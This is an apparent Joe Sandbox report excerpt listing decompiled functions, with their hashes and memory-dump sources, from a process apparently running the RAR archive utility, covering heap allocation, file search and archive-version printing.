                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B77244 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B77244(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x50b77263;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x50b772a6;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x50b7728a;
				if (E00007FF67FF650B74764() == 0) goto 0x50b772a6;
				if (E00007FF67FF650B73598(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x50b772a6;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x50b77275;
				goto 0x50b772b3;
				E00007FF67FF650B74DAC(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                            0x7ff650b77244
                                                                                                            0x7ff650b77253
                                                                                                            0x7ff650b77257
                                                                                                            0x7ff650b77257
                                                                                                            0x7ff650b77261
                                                                                                            0x7ff650b7726f
                                                                                                            0x7ff650b77273
                                                                                                            0x7ff650b7727c
                                                                                                            0x7ff650b77288
                                                                                                            0x7ff650b77299
                                                                                                            0x7ff650b772a2
                                                                                                            0x7ff650b772a4
                                                                                                            0x7ff650b772a6
                                                                                                            0x7ff650b772ab
                                                                                                            0x7ff650b772b8

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 4335e785d3bc18f7ecbbc7e643a73cdb398c78585cae8272f4c29271f955f799
                                                                                                            • Instruction ID: 5f4019642425f1b1019c8dd80e2e43773d302dae1e992539e1d6e6271f96216d
                                                                                                            • Opcode Fuzzy Hash: 4335e785d3bc18f7ecbbc7e643a73cdb398c78585cae8272f4c29271f955f799
                                                                                                            • Instruction Fuzzy Hash: 63F06D44B9D20362FE9456A29BD17B412915F8BB84F4C4430DD1FE67D3EF1EE8404215
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3494C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E00007FF67FF650B3494C(void* __rax, long long __rbx, signed int __rcx, void* __rdx, long long _a8) {
				void* _t22;
				void* _t24;

				_t22 = __rax;
				_a8 = __rbx;
				_t24 = __rdx;
				 *((char*)(__rdx + 0x1044)) = 0;
				if (E00007FF67FF650B4498C(__rax, __rcx) != 0) goto 0x50b349b7;
				E00007FF67FF650B34AC0(__rax, __rcx | 0xffffffff, __rcx, _t24); // executed
				if (_t22 == 0xffffffff) goto 0x50b349b7;
				FindClose(??); // executed
				 *(_t24 + 0x1040) =  *(_t24 + 0x1040) & 0x00000000;
				 *((char*)(_t24 + 0x100c)) = E00007FF67FF650B335E8( *((intOrPtr*)(_t24 + 0x1008)));
				 *((char*)(_t24 + 0x100d)) = E00007FF67FF650B337A4( *((intOrPtr*)(_t24 + 0x1008)));
				goto 0x50b349b9;
				return 0;
			}





                                                                                                            0x7ff650b3494c
                                                                                                            0x7ff650b3494c
                                                                                                            0x7ff650b34956
                                                                                                            0x7ff650b34959
                                                                                                            0x7ff650b3496a
                                                                                                            0x7ff650b34976
                                                                                                            0x7ff650b3497f
                                                                                                            0x7ff650b34984
                                                                                                            0x7ff650b34990
                                                                                                            0x7ff650b349a2
                                                                                                            0x7ff650b349ad
                                                                                                            0x7ff650b349b5
                                                                                                            0x7ff650b349c3

                                                                                                            APIs
                                                                                                              • Part of subcall function 00007FF650B34AC0: FindFirstFileW.KERNELBASE(00000000,?,00000000,?,00000000,00007FF650B34A18,?,?,?,00007FF650B442F8), ref: 00007FF650B34B0A
                                                                                                              • Part of subcall function 00007FF650B34AC0: FindFirstFileW.KERNELBASE(?,?,?,00007FF650B442F8), ref: 00007FF650B34B3B
                                                                                                              • Part of subcall function 00007FF650B34AC0: GetLastError.KERNEL32(?,?,?,00007FF650B442F8), ref: 00007FF650B34B4A
                                                                                                            • FindClose.KERNELBASE ref: 00007FF650B34984
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1464966427-0
                                                                                                            • Opcode ID: 0cd59dd66d6cfba18eb156040a2cc3616c41a54991557f3e497bd31e3f9be0df
                                                                                                            • Instruction ID: de3034e70a7a851d9e21c8006fe99edb3be65673f56c06cc5d431fdb414287d9
                                                                                                            • Opcode Fuzzy Hash: 0cd59dd66d6cfba18eb156040a2cc3616c41a54991557f3e497bd31e3f9be0df
                                                                                                            • Instruction Fuzzy Hash: BFF0D6229082C256EB119A7451803E933509F1BBB4F1C4334DEBE5B3CBCE59D0848721
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7499C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E00007FF67FF650B7499C(intOrPtr* __rax, void* __rcx) {
				void* __rbx;

				if (__rcx - 0xffffffe0 > 0) goto 0x50b749e7;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x50b749ce;
				if (E00007FF67FF650B74764() == 0) goto 0x50b749e7;
				if (E00007FF67FF650B73598(__rax,  ==  ? __rax : __rcx,  ==  ? __rax : __rcx) == 0) goto 0x50b749e7;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x50b749b9;
				goto 0x50b749f4;
				E00007FF67FF650B74DAC(__rax);
				 *__rax = 0xc;
				return 0;
			}




                                                                                                            0x7ff650b749a9
                                                                                                            0x7ff650b749b3
                                                                                                            0x7ff650b749b7
                                                                                                            0x7ff650b749c0
                                                                                                            0x7ff650b749cc
                                                                                                            0x7ff650b749da
                                                                                                            0x7ff650b749e3
                                                                                                            0x7ff650b749e5
                                                                                                            0x7ff650b749e7
                                                                                                            0x7ff650b749ec
                                                                                                            0x7ff650b749f9

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: fc785f146a0732617bbcf3b11196cf241df64f31f41ad6ae6ac351263aa359fb
                                                                                                            • Instruction ID: 29943ec0f52108c26e2692c825357812f6f4e269551d232887bb9ffac99bec3d
                                                                                                            • Opcode Fuzzy Hash: fc785f146a0732617bbcf3b11196cf241df64f31f41ad6ae6ac351263aa359fb
                                                                                                            • Instruction Fuzzy Hash: 90F01C45B5D24769FE6466B15AD267621905F87BA2F0C4730DE2FE63C2DF2EE8408213
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B283F0 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B283F0(long long __rcx, long long __rdx, long long __r8, long long __r9, intOrPtr _a8, char _a16) {
				intOrPtr _t9;
				void* _t14;
				void* _t22;
				struct _IO_FILE* _t23;
				void* _t31;

				_t22 = _t31;
				 *((long long*)(_t22 + 8)) = __rcx;
				 *((long long*)(_t22 + 0x10)) = __rdx;
				 *((long long*)(_t22 + 0x18)) = __r8;
				 *((long long*)(_t22 + 0x20)) = __r9;
				_t9 =  *0x50b99964; // 0x0
				if (_t9 + 0xfffffffe - 1 <= 0) goto 0x50b28450;
				E00007FF67FF650B72A80(2, _t22);
				fflush(_t23);
				E00007FF67FF650B72A80((0 |  *0x50b99964 == 0x00000001) + 1, _t22);
				_t14 = E00007FF67FF650B2803C(_t22, _a8,  &_a16); // executed
				return _t14;
			}








                                                                                                            0x7ff650b283f0
                                                                                                            0x7ff650b283f3
                                                                                                            0x7ff650b283f7
                                                                                                            0x7ff650b283fb
                                                                                                            0x7ff650b283ff
                                                                                                            0x7ff650b28408
                                                                                                            0x7ff650b28414
                                                                                                            0x7ff650b2841b
                                                                                                            0x7ff650b28423
                                                                                                            0x7ff650b2843b
                                                                                                            0x7ff650b2844b
                                                                                                            0x7ff650b28455

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWritefflush
                                                                                                            • String ID:
                                                                                                            • API String ID: 552385020-0
                                                                                                            • Opcode ID: bac3722bfab856619916dc818499b55c6a3c69d412a7549366e93f0ce05b5c4c
                                                                                                            • Instruction ID: 439bb4f32b96021a9be54aa5e3796d9990e8b67eebc24860537f9bcb8a7497b2
                                                                                                            • Opcode Fuzzy Hash: bac3722bfab856619916dc818499b55c6a3c69d412a7549366e93f0ce05b5c4c
                                                                                                            • Instruction Fuzzy Hash: 61F05E72D1A74392EA58A765A8C117D3794EBA6B80F180138E56FE3392CE3EE590C640
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B43950 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E00007FF67FF650B43950(void* __ecx, long long __rdx, void* __r8) {
				void* __rbx;
				char _t8;
				long long _t13;
				void* _t18;

				_t13 = __rdx;
				if (__ecx - 1 <= 0) goto 0x50b43965;
				goto 0x50b4398b;
				if (__ecx != 0) goto 0x50b43979;
				r8b = r9b;
				E00007FF67FF650B444BC(_t8, __rdx, __rdx, __r8, _t18); // executed
				goto 0x50b43989;
				GetModuleFileNameW(??, ??, ??);
				E00007FF67FF650B45170(0, __r8, _t13);
				return 1;
			}







                                                                                                            0x7ff650b43959
                                                                                                            0x7ff650b4395f
                                                                                                            0x7ff650b43963
                                                                                                            0x7ff650b43967
                                                                                                            0x7ff650b43969
                                                                                                            0x7ff650b43972
                                                                                                            0x7ff650b43977
                                                                                                            0x7ff650b4397b
                                                                                                            0x7ff650b43984
                                                                                                            0x7ff650b43990

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 083037041e7d9244aa8e0c554711019ec4f86cb214d921092dc1ad45f64c1dfe
                                                                                                            • Instruction ID: 4fa9b20bf1a0f67cfde089e633e68d50a42425b4bf5aa8fbc3f7222879817dce
                                                                                                            • Opcode Fuzzy Hash: 083037041e7d9244aa8e0c554711019ec4f86cb214d921092dc1ad45f64c1dfe
                                                                                                            • Instruction Fuzzy Hash: C2E04691E29203B0EDAC266328D507A02420F67FC0E5C213DCD9BA63829E9FE2911A00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B69B58 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 680105476-0
                                                                                                            • Opcode ID: 9efd176f5b404f0b530c2c6f7b7be0f5a1fcc998daa1936710b58f04fd0056a1
                                                                                                            • Instruction ID: 295485d2f569ab843439ea0c16dc36d251f0dc9e04d8701877d673c216ee04cf
                                                                                                            • Opcode Fuzzy Hash: 9efd176f5b404f0b530c2c6f7b7be0f5a1fcc998daa1936710b58f04fd0056a1
                                                                                                            • Instruction Fuzzy Hash: 5EE0EC80E0910775FE2825A129D507402484F5F7B0E2C1B30D97FE93C2AD1EE4528610
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7FAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeLibrary
                                                                                                            • String ID:
                                                                                                            • API String ID: 3664257935-0
                                                                                                            • Opcode ID: 58bc5cbb97e07358933adfe0b8bfb86a44c944216e6a84c33e6727c0436271d8
                                                                                                            • Instruction ID: 362e7e4829e33ed53d0f0271cef318b7173d2fbd537d27d2d5360cddc7301f25
                                                                                                            • Opcode Fuzzy Hash: 58bc5cbb97e07358933adfe0b8bfb86a44c944216e6a84c33e6727c0436271d8
                                                                                                            • Instruction Fuzzy Hash: 63D05E55D19D03A5F7049F40E8E63342260BF16315F680A34C00FA8361CF2FA0488300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 00007FF650B36AE8 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 440COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E00007FF67FF650B36AE8(void* __ecx, void* __edx, signed int __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r9) {
				void* __rbp;
				void* _t165;
				void* _t171;
				void* _t172;
				void* _t188;
				void* _t195;
				void* _t196;
				signed int _t213;
				intOrPtr _t225;
				char _t226;
				void* _t243;
				void* _t254;
				void* _t255;
				void* _t256;
				void* _t277;
				void* _t310;
				signed long long _t311;
				signed long long _t312;
				long long _t318;
				signed int _t321;
				void* _t347;
				void* _t408;
				void* _t417;
				void* _t418;
				void* _t420;
				signed long long _t421;
				void* _t446;
				void* _t447;
				void* _t449;
				void* _t451;
				void* _t453;
				void* _t455;
				void* _t457;
				void* _t459;

				_t444 = __r9;
				_t410 = __rsi;
				_t321 = __rbx;
				_t310 = _t420;
				 *((long long*)(_t310 + 0x10)) = __rbx;
				 *((long long*)(_t310 + 0x18)) = __rsi;
				 *((long long*)(_t310 + 0x20)) = __rdi;
				_t4 = _t310 - 0xa028; // -38960
				_t418 = _t4;
				E00007FF67FF650B69CB0(0xa100, _t310, _t446, _t447);
				_t421 = _t420 - _t310;
				_t311 =  *0x50b978f0; // 0x27db226282f1
				_t312 = _t311 ^ _t421;
				 *(_t418 + 0x9ff0) = _t312;
				_t408 = __rcx;
				 *(_t421 + 0x48) = _t312;
				r15d = 0;
				 *(_t421 + 0x58) = _t312;
				r12d = 0;
				 *((intOrPtr*)(_t421 + 0x54)) = 0;
				 *(_t421 + 0x50) = 0;
				r14d =  *(__rcx + 0x952c) & 0x0000ffff;
				_t256 = r14w - 0x54;
				 *((char*)(_t421 + 0x44)) = _t256 == 0;
				if (_t256 != 0) goto 0x50b36b69;
				 *((char*)(_t421 + 0x40)) = 1;
				if ( *((short*)(__rcx + 0x952e)) == 0x41) goto 0x50b36b6d;
				 *((char*)(_t421 + 0x40)) = 0;
				 *((char*)(_t421 + 0x43)) = r14w == 0x42;
				r13d =  *(__rcx + 0x952a) & 0x0000ffff;
				 *(_t421 + 0x46) = r13w;
				 *((char*)(_t421 + 0x42)) = r13w == 0x56;
				r8d = 0x800;
				_t19 = _t418 + 0x8ff0; // -2112
				if (E00007FF67FF650B24300(__rbx, __rcx, _t19, __rsi, _t418) == 0) goto 0x50b371e2;
				if ( *((intOrPtr*)(_t408 + 0x6134)) == 0) goto 0x50b36bbf;
				E00007FF67FF650B5785C(_t243, _t255, _t408 + 0x6030, _t408);
				_t22 = _t421 + 0x60; // 0x818
				E00007FF67FF650B173C8(_t321, _t22, _t408, _t410, _t457, _t455);
				_t23 = _t418 + 0x8ff0; // -2112
				_t24 = _t421 + 0x60; // 0x818
				if (E00007FF67FF650B3298C(_t24, _t23) != 0) goto 0x50b36bec;
				_t411 =  *(_t421 + 0x48);
				goto 0x50b371aa;
				_t26 = _t418 - 0x66; // -39062
				E00007FF67FF650B37F90(0, _t254, _t312, _t321, 0x50ba7a90, _t26, __r9);
				r13b = 1;
				_t27 = _t421 + 0x60; // 0x818
				if (E00007FF67FF650B18E38(r13b, _t321, _t27, _t453) == 0) goto 0x50b3717d;
				 *((char*)(_t421 + 0x41)) = 0;
				if (r14w == 0x42) goto 0x50b36e16;
				_t29 = _t421 + 0x60; // 0x818
				E00007FF67FF650B1A91C(_t29);
				E00007FF67FF650B54598(0xda8, _t243, _t321,  *(_t421 + 0x48), _t418, _t26);
				_t30 = _t418 - 0x66; // -39062
				E00007FF67FF650B283F0(L"\n%s: %s", _t312, _t30, _t444, _t449);
				E00007FF67FF650B54598(0xdaa, _t243, _t321,  *(_t421 + 0x48), _t418, _t30);
				E00007FF67FF650B283F0(L"\n%s: ", _t312, _t30, _t444, _t417);
				_t426 =  ==  ? L"RAR 4" : L"RAR 5";
				_t314 = L"RAR 1.4";
				_t427 =  ==  ? L"RAR 1.4" :  ==  ? L"RAR 4" : L"RAR 5";
				E00007FF67FF650B283F0(L"%s%s", 0x50b8212c,  ==  ? L"RAR 1.4" :  ==  ? L"RAR 4" : L"RAR 5", _t444);
				if ( *((intOrPtr*)(_t418 + 0x7edc)) == 0) goto 0x50b36cd5;
				E00007FF67FF650B54598(0xdac, _t243, _t321,  *(_t421 + 0x48), _t418,  ==  ? L"RAR 1.4" :  ==  ? L"RAR 4" : L"RAR 5");
				E00007FF67FF650B283F0(L"%s%s", L", ", L"RAR 1.4", _t444);
				if ( *((intOrPtr*)(_t418 + 0x7ee8)) - _t321 <= 0) goto 0x50b36d00;
				E00007FF67FF650B54598(0xdae, _t243, _t321,  *(_t421 + 0x48), _t418, _t314);
				E00007FF67FF650B283F0(L"%s%s", L", ", _t314, _t444);
				if ( *((intOrPtr*)(_t418 + 0x7edd)) == 0) goto 0x50b36d5c;
				if ( *((intOrPtr*)(_t418 + 0x7ed8)) != 3) goto 0x50b36d3c;
				E00007FF67FF650B283F0(L", ", L", ", _t314, _t444);
				E00007FF67FF650B54598(0xe82, _t243, _t321,  *(_t421 + 0x48), _t418, _t314);
				E00007FF67FF650B283F0(_t314, L", ", _t314, _t444);
				goto 0x50b36d5c;
				E00007FF67FF650B54598(0xdb0, _t243, _t321,  *(_t421 + 0x48), _t418, _t314);
				E00007FF67FF650B283F0(L"%s%s", L", ", _t314, _t444);
				r15d = 0;
				if ( *((intOrPtr*)(_t418 + 0x7ee3)) == r15b) goto 0x50b36d99;
				E00007FF67FF650B54598(0xdb2, _t243, _t321,  *(_t421 + 0x48), _t418, _t314);
				_t385 =  ==  ? 0x50b82194 : L", ";
				E00007FF67FF650B283F0(L"%s%s",  ==  ? 0x50b82194 : L", ", _t314, _t444);
				if ( *((intOrPtr*)(_t418 + 0x7edf)) == r15b) goto 0x50b36dd3;
				E00007FF67FF650B54598(0xdb4, _t243, _t321, _t411, _t418, _t314);
				_t387 =  ==  ? 0x50b821b4 : L", ";
				E00007FF67FF650B283F0(L"%s%s",  ==  ? 0x50b821b4 : L", ", 0x50b82194, _t444);
				if ( *((intOrPtr*)(_t418 + 0x7ee4)) == 0) goto 0x50b36e0a;
				E00007FF67FF650B54598(0xdb8, _t243, _t321, _t411, _t418, 0x50b82194);
				_t389 =  ==  ? 0x50b821cc : L", ";
				E00007FF67FF650B283F0(L"%s%s",  ==  ? 0x50b821cc : L", ", 0x50b821b4, _t444);
				E00007FF67FF650B283F0("\n",  ==  ? 0x50b821cc : L", ", 0x50b821b4, _t444);
				 *((short*)(_t418 + 0x8f80)) = 0;
